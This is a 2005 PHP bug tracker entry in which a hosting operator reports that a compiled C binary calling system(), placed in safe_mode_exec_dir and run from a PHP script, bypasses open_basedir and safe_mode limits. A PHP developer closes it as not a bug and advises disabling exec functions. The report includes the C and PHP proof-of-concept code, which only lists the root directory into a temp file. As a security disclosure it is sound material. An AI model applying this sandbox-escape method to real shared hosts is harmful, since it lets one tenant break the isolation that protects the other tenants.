ID: 32421 Updated by: [EMAIL PROTECTED] Reported By: ricardi at gmail dot com Status: Bogus Bug Type: Program Execution Operating System: *nix (Tested on Linux) PHP Version: 4.3.10 New Comment:
>The PHP engine can't not control de children created by the >exec functions? exactly. and nobody can. Previous Comments: ------------------------------------------------------------------------ [2005-03-23 16:38:58] ricardi at gmail dot com The PHP engine can't not control de children created by the exec functions? This could be a great security enhancement, since that some php applications are suffering from xploits that use this technic. I've already disable this functions now, but our clients are unhappy with this limitations. ------------------------------------------------------------------------ [2005-03-23 08:23:53] [EMAIL PROTECTED] Disable system() and other exec functions then. PHP is unable to prevent you to shoot your leg or to format harddrive with a binary called by a binary. ------------------------------------------------------------------------ [2005-03-23 01:10:23] ricardi at gmail dot com Description: ------------ We bypass the safe_mode restrictions using binary with "system" function built-in. The problem occurs when we had an incident in a mass virtualhost machine. One of the domains, execute a script that bypass the safe_mode restrictions like open_base_dir and safe_mode_exec_dir. The configurations in the virtualhost was like: <VirtualHost *> ServerName www.something.com ServerPath /mnt/nfs/domains/something.com.br/www php_admin_value open_basedir /mnt/nfs/domains/something.com.br/ php_admin_value upload_tmp_dir /mnt/nfs/domains/something.com.br/ php_admin_value safe_mode_include_dir /mnt/nfs/domains/something.com.br/ php_admin_value safe_mode_exec_dir /mnt/nfs/domains/something.com.br/ ... </VirtualHost> We create a simple program in "C" that create a file outside the open_basedir and execute a binary that isn't in the safe_mode_exec_dir: /* --------------- Contents of file.c ---------------- */ #include <stdio.h> int main() { system("find / -maxdepth 1 > /tmp/trash.txt"); return 0; } Compiling: gcc -o file file.c With an ftp access, we put the file in the safe_mode_exec_dir: > ls -la mnt/nfs/domains/something.com.br/ -rwxr-xr-x 1 nfsnobod nfsnobod 13576 Mar 22 16:57 file Now create a php script that calls the binary. <?php system("file"); ?> Then put this on the webroot and after accessing the script with http://www.something.com.br/script.php, check the /tmp: > ls -la /tmp -rw-r--r-- 1 nfsnobody nfsnobody 139 Mar 22 21:00 trash.txt We had to disable the execution feature from our product. ------------------------------------------------------------------------ -- Edit this bug report at http://bugs.php.net/?id=32421&edit=1